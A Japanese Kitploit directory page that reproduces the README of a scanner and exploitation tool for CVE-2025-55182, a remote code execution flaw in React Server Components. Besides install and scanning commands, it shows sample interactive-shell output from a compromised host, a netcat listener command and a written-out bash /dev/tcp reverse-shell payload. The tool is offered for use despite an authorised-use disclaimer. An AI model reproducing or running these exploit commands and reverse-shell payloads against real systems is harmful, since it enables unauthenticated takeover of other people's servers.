Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — React Server Components向けの重大なRCE脆弱性スキャナー (CVE-2025-55182)。マルチペイロードサポート、プロキシ機能、インタラクティブなコマンド実行を備えた自動化悪用フレームワーク。 | Kitploit
ツール/GitHubGitHub/alihzsec/cve-2025-55182
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツールペイロード開発
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

React Server Components向けの重大なRCE脆弱性スキャナー (CVE-2025-55182)。マルチペイロードサポート、プロキシ機能、インタラクティブなコマンド実行を備えた自動化悪用フレームワーク。

リポジトリを見る
1518ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 スキャナー&エクスプロイター

[!Warning] このリポジトリは教育および研究目的のみを意図しています。

  • 提供されるPoCは自身が所有するシステム、または明示的な許可を得たシステムでのみ使用してください。
  • 無許可のアクセス、悪用、またはこのリポジトリ内の素材の誤用は違法です。
  • 作者は不適切な使用に起因するいかなる損害、誤用、または法的結果についても一切責任を負いません。

🔍 概要

CVE-2025-55182 は、React Server Components バージョン 19.0.0、19.1.0、19.1.1、および 19.2.0 に影響する重大なリモートコード実行脆弱性です。この脆弱性は、Server Function エンドポイントへの HTTP リクエストペイロードの安全でないデシリアライゼーションに起因し、認証されていない攻撃者がリモートで任意のコードを実行することを可能にします。


🐛 脆弱性の詳細

CVE ID: CVE-2025-55182
影響を受けるバージョン:

  • react-server-dom-webpack 19.0.0、19.1.0、19.1.1、19.2.0
  • react-server-dom-turbopack 19.0.0、19.1.0、19.1.1、19.2.0
  • react-server-dom-parcel 19.0.0、19.1.0、19.1.1、19.2.0

🚀 インストール

前提条件

  • Python 3.8 以上
  • pip(Python パッケージマネージャー)

セットアップ

  1. リポジトリをクローン
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. 仮想環境を作成(推奨)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. 依存関係をインストール
root@kitploit:~
pip install -r requirements.txt

📖 使用方法

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

引数


🎯 検出モード

単一ターゲットのスキャン

root@kitploit:~
python3 main.py -d -u https://example.com

ファイルから複数ターゲットをスキャン

root@kitploit:~
python3 main.py -d -l targets.txt

プロキシを使用したスキャン

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

サイレントモード(脆弱なターゲットのみ出力)

root@kitploit:~
python3 main.py -d -l targets.txt -s

マルチスレッドスキャン

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 エクスプロイトモード

インタラクティブシェル

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

次に、インタラクティブシェル用に [i] を選択します:

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

リバースシェル

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

次に、リバースシェル用に [r] を選択し、ペイロードタイプを選びます:

オプション1:デフォルトペイロード(推奨)

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

このツールは、成功するまで17以上の異なるリバースシェルペイロードを自動的に試行します。

オプション2:カスタムペイロード

root@kitploit:~
Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 参考情報

  • Official React Security Advisory
  • Meta Security Advisory
  • Vercel Security Advisory
  • Next.js Security Advisory
  • CVE Details

このツールが役に立ったと思われたら、スターを付けていただけると幸いです! ⭐
セキュリティコミュニティのために❤️を込めて作られています
ツールをダウンロード
引数説明
-d, --detection検出モードで実行(脆弱性をスキャン)
-e, --exploitエクスプロイトモードで実行(単一ターゲットを悪用)
-u, --url URLスキャン/エクスプロイトする単一ターゲットURL
-l, --list FILEターゲットURLのリストを含むファイル(検出モードのみ)
-p, --proxy URL単一プロキシURL(例:http://127.0.0.1:8080)
-pl, --proxy-list FILEプロキシURLのリストを含むファイル(1行に1つ)
-t, --threads N同時スレッド数(デフォルト:10、検出モードのみ)
-s, --silentサイレントモード - 脆弱なターゲットのみ表示(検出モードのみ)
-o, --output [FILE]脆弱なターゲットをファイルに保存(検出モードのみ)。ファイル名が指定されない場合、デフォルト:CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt を使用
--debugデバッグロギングを有効化 - 応答の詳細と再試行試行を表示(サイレントモードでは使用不可)